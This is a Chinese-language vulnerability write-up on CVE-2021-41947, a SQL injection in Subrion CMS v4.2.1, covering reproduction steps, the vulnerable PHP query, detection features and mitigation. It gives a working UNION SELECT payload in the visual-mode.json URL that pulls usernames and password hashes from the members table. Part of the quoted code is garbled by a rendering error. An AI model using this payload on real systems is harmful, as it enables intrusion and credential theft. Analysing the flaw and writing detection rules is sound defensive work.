赞
踩
·漏洞名称:Subrion CMS存在SQL注入
·漏洞编号:CVE-2021-41947
·漏洞类型:SQL注入
·漏洞威胁等级:高危
·影响范围:Subrion CMS v4.2.1
·利用条件:版本为v4.2.1
Subrion CMS是Subrion团队的一套基于PHP的内容管理系统(CMS)。该系统可被集成到网站,并支持多种扩展插件等
Subrion CMS v4.2.1版本在可视模式下存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
http
1.按照提示信息配置网站信息
2.首页
2.正常存在漏洞的业务功能点先进入v-isual mode
在首页进行编辑
3.漏洞利用(必须以admin管理员用户登录,普通用户无效)
直接在url处写入payload:
panel/visual-mode.json?get=access&type=blocks' UNION ALL SELECT username, password FROM sbr421_members -- -&object=landing_what_is_this&page=index
(type、object和page参数后的value可为任意值type后的值跟单引号闭合),即可得到敏感信息
\
字符型注入,参数type用单引号标识,代码未对敏感关键字进行判断,只需单引号闭合即可绕过,从而获取敏感信息
if (‘blocks’ == $type) {
$object = KaTeX parse error: Expected '}', got 'EOF' at end of input: …', "`name` = '{object}'");
}
$sql = "SELECT IF(`page_name` = '', 'global', 'page'), `access` FROM `{$this->_iaDb->prefix}objects_pages` ";
$sql .= "WHERE `object_type` = '{$type}' && `object` = '{$object}' && `page_name` IN ('', '{$page}')";
正常流量:
攻击流量:
在visual-mode.json?get=access&type=blocks后,紧跟恶意sql注入payload,响应体result部分回显出敏感信息
type字段后的值跟单引号闭合,后用“-- -”闭合
以下版本受该漏洞影响:v4.21
目前最高版本:V4.21
以下为该漏洞请求包特征
1.“panel/visual-mode.json?get=access”
2.type字段后单引号闭合,随后跟随恶意的select语句
观察visual-mode.json?get=access&type=blocks后,是否紧跟恶意sql注入payload,若存在,则观察响应体result部分是否回显出敏感信息,若出现,则攻击成功
官方未更新版本,该漏洞版本为最新版
写入过滤规则,黑名单等
源码下载url:https://github.com/intelliants/subrion
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。